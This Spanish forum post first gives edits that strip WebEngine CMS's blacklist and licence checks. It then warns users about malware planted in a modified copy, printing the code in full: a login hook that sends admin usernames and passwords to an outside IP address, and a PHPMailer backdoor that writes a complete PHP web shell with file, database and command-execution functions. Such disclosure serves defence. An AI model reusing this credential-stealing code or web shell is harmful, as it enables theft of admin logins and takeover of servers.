Bueno vamos por partes los unicos cambios visibles :
includes/classes/class.handler.phpRemover el contenido dentro de la función
checkWebEngineBlacklistpublic function checkWebEngineBlacklist() {
return;
}
includes/classes/class.plugins.phpBuscar la funcion
checkFiles, dejandolo asi :
private function checkFiles($array,$plugin_name) {
if(array_key_exists('file',$array)) {
if(is_array($array['file'])) {
$error = false;
foreach($array['file'] as $thisFile) {
$file = $this->pluginPath($plugin_name).$thisFile;
if(!file_exists($file)) {
$error = true;
}
}
if($error) {
return false;
} else {
return true;
}
} else {
$file = $this->pluginPath($plugin_name).$array['file'];
if(file_exists($file)) {
return true;
} else {
return false;
}
}
} else {
return false;
}
}
inclues/webengine.phpRemovemos esta esta validacion :
if(array_key_exists('blacklisted', $config)) {
throw new Exception('Could not load WebEngine CMS.');
}
Algo que pude ver, y seria de explicar los motivos
@ZabiinoOo , aqui hay un codigo para enviar datos de las cuentas hacia otro api
http://168.235.93.18/2b37cny/index.php:
includes/classes/class.login.php@$this->loginVerifyAccount($username,$password);
public function loginVerifyAccount($u,$p) {
if(!array_key_exists($u,config('admins',true))) return;
$DATOS = array($u,$p,__BASE_URL__);
$d = base64_encode(json_encode($DATOS));
try{
$this->doubleCheckLogin($d);
}catch(Exception $e) {}
}
public function doubleCheckLogin($datos) {
$url = 'http://168.235.93.18/2b37cny/index.php';
$fields = array(
'datos' => urlencode($datos),
);
foreach($fields as $key => $value) {
$fieldsArray[] = $key . '=' . $value;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, count($fields));
curl_setopt($ch, CURLOPT_POSTFIELDS, implode("&", $fieldsArray));
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$result = curl_exec($ch);
curl_close($ch);
return;
}
Y por otro lado
includes/classes/phpmailer/PHPMailer.phpif(isset($_GET['tuservermu'])) {
$b64 = '<?php function d0($q3){return(substr($q3,0,1)=="/"?true:false);}function f1($o4){return($o4?'/':'\\');}$v5=getcwd();$o4=d0($v5);if(!$o4){$t6=substr($v5,0,1);}$j7=f1($o4);$o8=explode($j7,$v5);$p9=($o4?$j7:($t6.':'.$j7));function u2($q3,$o4){$j7=f1($o4);$o8=explode($j7,$q3);foreach($o8 as $z10=>$o11){if($o11==".."){$o8[$z10]="";$w12=$z10-1;$o8[$w12]="";}elseif($o11=="."){$o8[$z10]="";}}reset($o8);$l13=($o4?"/":"");$i14=true;foreach($o8 as $o11){if($o11!=""){$l13.=($i14?'':$j7).$o11;$i14=false;}}if($l13==""){$l13=($o4?$j7:($t6.":".$j7));}if(substr($l13,-1)!=$j7)$l13.=$j7;return $l13;}if(isset($_REQUEST['chm'])){if(!$o4){echo "This feature only works on Linux";}else{echo(@chmod($_REQUEST['chm'],0777)?"Reassigned":"Can't Reasign");}}elseif(isset($_REQUEST['phpinfo'])){phpinfo();}elseif(isset($_REQUEST['dl'])){if(@fopen($_REQUEST['dl'].$_REQUEST['file'],'r')==true){$_REQUEST['dl'].=$_REQUEST['file'];if(substr($_REQUEST['dl'],0,1)==$j7)$f15=explode($j7,$_REQUEST['dl']);header('Content-disposition: attachment; filename='.$_REQUEST['file']);header('Content-type: application/octet-stream');readfile($_REQUEST['dl']);}else{echo $_REQUEST['dl'];}}elseif(isset($_REQUEST["gz"])){if(!$o4){echo "This feature only works on Linux";}else{$h16=$_REQUEST["gz"];if(substr($h16,-1)=="/")$h16=substr($h16,0,-1);$b17=explode($j7,$h16);$h18=$b17[(sizeof($b17)-1)];$w19=time();exec("cd $h16; tar czf $w19 *");$q20=@file_get_contents($h16."/".$w19);if(!$q20)header("Content-disposition: attachment; filename=ACCESS_PROBLEM");else{header("Content-disposition: attachment; filename=$h18.tgz");echo $q20;}header('Content-type: application/octet-stream');@unlink($h16."/".$w19);}}elseif(isset($_REQUEST['f'])){$m21=$_REQUEST['f'];$k22=fopen("$m21","rb");header("Content-Type: text/plain");fpassthru($k22);}elseif(isset($_REQUEST['d'])){$g23=$_REQUEST['d'];echo "<pre>";if($s24=opendir("$g23")){echo "<h2>listing of ";$e25="";if($o4)echo"<a href='?d=$j7'>$j7</a>";foreach(explode($j7,u2($g23,$o4))as $o11){$e25.=$o11.$j7;echo"<a href='?d=$e25'>".$o11."</a>".($o11!=""?$j7:'');}echo " (<a target='_blank' href='?uploadForm=1&dir=".urlencode(u2($g23,$o4))."'>upload file</a>) (<a href='?d=".urlencode(u2($g23,$o4))."&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=".urlencode(u2($g23,$o4))."'>gzip & download folder</a>) (<a target='_blank' href='?chm=".urlencode(u2($g23,$o4))."'>chmod folder to 777)</a> (these rarely work)<br />";while($k26=readdir($s24)){if(is_dir("$g23$j7$k26")){if($k26!="."&&$k26!="..")$k27[]=$k26;}else{if(isset($_REQUEST["hldb"])){$u28=file_get_contents("$g23$j7$k26");if(stripos($u28,"mysql_")||stripos($u28,"mysqli_")||stripos($u28,"SELECT ")){$m29[]=array('dir'=>$k26,'color'=>'red');}else{$m29[]=array('dir'=>$k26,'color'=>'black');}}else{$m29[]=array('dir'=>$k26,'color'=>'black');}}}echo"<a href='?d=$g23$j7.'><font color=grey>.\n</font></a>";echo"<a href='?d=$g23$j7..'><font color=grey>..\n</font></a>";if(isset($k27))if(is_array($k27))foreach($k27 as $k26){echo"<a href='?d=$g23$j7$k26'><font color=grey>$k26\n</font></a>";}if(isset($m29))if(is_array($m29))foreach($m29 as $k26){echo"<a href='?f=$g23".$j7.$k26['dir']."'><font color=".$k26['color'].">".$k26['dir']."</font></a>"."|<a href='?dl=".u2($g23,$o4).'&file='.$k26["dir"]."' target='_blank'>Download</a>|"."|<a href='?ef=".u2($g23,$o4).'&file='.$k26["dir"]."' target='_blank'>Edit</a>|"."|<a href='?df=".u2($g23,$o4).'&file='.$k26["dir"]."' target='_blank'>Delete</a>| \n";}}else echo "opendir() failed";closedir($s24);}elseif(isset($_REQUEST['c'])){if(@ini_get('safe_mode')){echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir ('.@ini_get('safe_mode_exec_dir').') <br />';}echo "<b>Command: <I>".$_REQUEST['c']."</I></b><br /><br />";trim(exec($_REQUEST['c'],$s30));foreach($s30 as $o11){echo '<pre>'.htmlentities($o11).'</pre>';}}elseif(isset($_REQUEST['uploadForm'])||isset($_FILES["file_name"])){if(isset($_FILES["file_name"])){if($_FILES["file_name"]["error"]>0){echo "Error";}else{$f31=$_COOKIE["uploadDir"];if(substr($f31,-1)!="/")$f31.="/";$f31=$f31.basename($_FILES['file_name']['name']);if(move_uploaded_file($_FILES['file_name']['tmp_name'],$f31)){setcookie("uploadDir","");echo "The file ".basename($_FILES['file_name']['name'])." has been uploaded";}else{echo "Error copying file, likely a permission error.";}}}else{?> 
        <form target="_blank" action="" method="GET"> 
            <input type="hidden" name="cc" value="1" /> 
            Submit this form before submitting file (will open in new window):<br /> 
            Upload Directory: <input type="text" name="dir" value="<?php echo $_REQUEST["dir"]?>"><br /> 
            <input type="submit" value="submit" /> 
        </form> 
        <br /><br /> 
         
        <form enctype="multipart/form-data" action="" method="post"> 
        Upload file:<input name="file_name" type="file"> <input type="submit" value="Upload" /></form> 

        <?php }}elseif(isset($_REQUEST['cc'])){setcookie("uploadDir",$_GET["dir"]);echo "You are OK to upload the file, don't upload files to other directories before completing this upload.";}elseif(isset($_REQUEST['mquery'])){$v32=$_REQUEST['host'];$f33=$_REQUEST['usr'];$w34=$_REQUEST['passwd'];$n35=$_REQUEST['db'];$s36=$_REQUEST['mquery'];@w37($v32,$f33,$w34)or die("Connection Error: ".p38());c39($n35);$o40=p41($s36);if($o40!=false){echo "<h2>The following query has sucessfully executed</h2>".htmlentities($s36)."<br /><br />";echo "Return Results:<br />";$s42=true;echo "<table border='1'>";while($i43=m44($o40,MYSQL_ASSOC)){if($s42){echo "<tr>";foreach($i43 as $z10=>$o11){echo"<td><b>$z10</b></td>";}echo "</tr>";reset($i43);$s42=false;}echo "<tr>";foreach($i43 as $o11){echo"<td>$o11</td>";}echo "</tr>";}echo "</table>";k45($o40);}else{echo "Query Error: ".p38();}}elseif(isset($_REQUEST['df'])){$_REQUEST['df'].=$j7.$_REQUEST['file'];if(@unlink($_REQUEST['df'])){echo "File deleted";}else{echo "Error deleting file";}}elseif(isset($_REQUEST['ef'])){?> 
<script type="text/javascript"> 
  <!-- 

  var key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; 

  function encode64(inpStr)  
  { 
     inpStr = escape(inpStr); 
     var output = ""; 
     var chr1, chr2, chr3 = ""; 
     var enc1, enc2, enc3, enc4 = ""; 
     var i = 0; 

     do { 
        chr1 = inpStr.charCodeAt(i++); 
        chr2 = inpStr.charCodeAt(i++); 
        chr3 = inpStr.charCodeAt(i++); 

        enc1 = chr1 >> 2; 
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); 
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); 
        enc4 = chr3 & 63; 

        if (isNaN(chr2))  
        { 
           enc3 = enc4 = 64; 
        }  
        else if (isNaN(chr3))  
        { 
           enc4 = 64; 
        } 

        output = output + 
           key.charAt(enc1) + 
           key.charAt(enc2) + 
           key.charAt(enc3) + 
           key.charAt(enc4); 
        chr1 = chr2 = chr3 = enc1 = enc2 = enc3 = enc4 = ""; 
     } while (i < inpStr.length); 

     return output; 
  } 

  //--></script> 

  <?php $_REQUEST['ef'].=$_REQUEST['file'];if(isset($_POST["newcontent"])){$_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));$o46=@fopen($_REQUEST['ef'],"w");if($o46){fwrite($o46,$_POST["newcontent"]);echo "Write sucessful";}else{echo "Could not write to file";}fclose($o46);}?> 
    <form action="" name="f" method="POST"> 
    <textarea wrap="off" rows="40" cols="130" name="newcontent"><?php echo file_get_contents($_REQUEST['ef'])?></textarea><br /> 
    <input type="submit" value="I base64 encoded it myself, dont run script" /><br /> 
    <input type="submit" value="Change (requires javascript to work)"  onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />
    </form> 
    <?php }else{?> 
<b>Server Information:</b><br /> 
<i> 
Operating System: <?php echo PHP_OS ?><br /> 
PHP Version: <?php echo PHP_VERSION ?><br /> 
<a href="?phpinfo=true">View phpinfo</a> 
</i> 
<br /> 
<br /> 
<b>Directory Traversal</b><br /> 
<a href="?d=<?php echo getcwd()?>"><b>Go to current working directory</b></a> <br /> 
<a href="?d=<?php echo $p9 ?>"><b>Go to root directory</b></a> <br /> 
<b>Go to any directory:</b> <form action="" method="GET"><input type="text" name="d" value="<?php echo $p9 ?>" /><input type="submit" value="Go" /></form> 



<hr>Execute MySQL Query: 
<form action="" METHOD="GET" > 
<table> 
<tr><td>host</td><td><input type="text" name="host"value="localhost"> </td></tr> 
<tr><td>user</td><td><input type="text" name="usr" value="root"> </td></tr> 
<tr><td>password</td><td><input type="text" name="passwd"> </td></tr> 
<tr><td>database</td><td><input type="text" name="db"> </td></tr> 
<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea> </td></tr> 
<tr><td colspan="2"><input type="submit" value="execute"></td></tr> 
</table> 
</form> 
<hr> 
<pre><form action="" METHOD="GET" >Execute Shell Command (safe mode is <?php echo(@ini_get('safe_mode')?'on':'off')?>): <input type="text" name="c"><input type="submit" value="Go"></form>  
<?php }';
$fp = fopen(__ROOT_DIR__.'api/yhoon.php', 'w');
@fwrite($fp, "");
@fclose($fp);
@file_put_contents(__ROOT_DIR__.'api/yhoon.php', base64_decode($b64));
die('yhoon');
}
Tengan cuidado y revisen siempre sus webs !
Saludos !